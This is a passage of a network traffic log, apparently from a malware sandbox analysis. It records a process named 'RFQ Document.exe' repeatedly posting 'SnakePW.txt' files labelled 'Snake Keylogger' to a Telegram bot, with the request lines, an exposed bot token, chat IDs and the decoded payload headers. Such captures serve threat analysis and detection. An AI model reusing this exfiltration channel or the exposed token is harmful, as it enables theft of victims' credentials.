                                            2021-09-28 05:58:33 UTC81INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12631,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808713,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            51192.168.2.449827149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:33 UTC81OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c963ae9b
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:33 UTC81OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 39 36 33 61 65 39 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c963ae9bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:33 UTC82INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:33 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:33 UTC82INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 33 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12632,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808713,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            52192.168.2.449828149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:33 UTC83OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c9804bda
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:33 UTC83OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 39 38 30 34 62 64 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c9804bdaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:33 UTC83INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:33 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:33 UTC84INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 33 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12633,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808713,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            53192.168.2.449829149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:33 UTC84OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c99f48fa
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:33 UTC85OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 39 39 66 34 38 66 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c99f48faContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:33 UTC85INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:33 GMT
                                            Content-Type: application/json
                                            Content-Length: 521
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:33 UTC85INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12634,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808713,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            54192.168.2.449830149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:33 UTC86OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c9be4785
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:33 UTC86OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 39 62 65 34 37 38 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c9be4785Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:34 UTC87INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:34 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:34 UTC87INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 33 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12636,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808714,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            55192.168.2.449831149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:34 UTC87OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c9dd5aad
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:34 UTC88OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 39 64 64 35 61 61 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c9dd5aadContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:34 UTC88INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:34 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:34 UTC89INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 33 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12637,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808714,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            56192.168.2.449832149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:34 UTC89OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c9fc4469
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:34 UTC89OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 39 66 63 34 34 36 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c9fc4469Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:34 UTC90INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:34 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:34 UTC90INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 33 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12638,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808714,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            57192.168.2.449833149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:34 UTC91OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ca18e239
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:34 UTC91OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 61 31 38 65 32 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255ca18e239Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:34 UTC91INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:34 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:34 UTC92INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 33 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 34 2c 22 64
